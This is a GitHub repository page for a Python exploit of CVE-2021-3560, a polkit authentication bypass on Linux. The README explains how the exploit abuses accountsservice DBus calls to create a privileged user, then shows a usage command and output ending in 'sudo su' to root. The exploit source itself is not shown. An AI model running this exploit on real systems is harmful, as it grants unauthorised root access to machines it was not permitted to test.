Skip to content

Cyblex-Consulting/CVE-2021-3560-Polkit-exploit

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 

Repository files navigation

Polkit-exploit - CVE-2021-3560

Privilege escalation with polkit - CVE-2021-3560

Summary

CVE-2021-3560 is an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus, in this exploit we will call 2 privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a priviliged user then setting a password to it and at the end logging as the created user and then elevate to root.

Exploit History

Original exploit author: Kevin Backhouse. Exploit code written by Ahmad Almorabea @almorabea and modified by @tigre-bleu (added credentials configuration)

Usage

test@ubuntu:~/Desktop$ python3 CVE-2021-3560.py -u toto -p toto -d "Pwned user"
[+]Starting the Exploit 
[+] User Created with the name of toto
[+] Timed out at: 0.008446890996407191
[+] Timed out at: 0.008934336684707084
[+] Exploit Completed, Your new user is 'toto' just log into it like, 'su toto' using password 'toto', and then 'sudo su' to root

Credits

Ahmad Almorabea @almorabea (http://almorabea.net) Kevin Backhouse (https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)

About

Privilege escalation with polkit - CVE-2021-3560

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 100.0%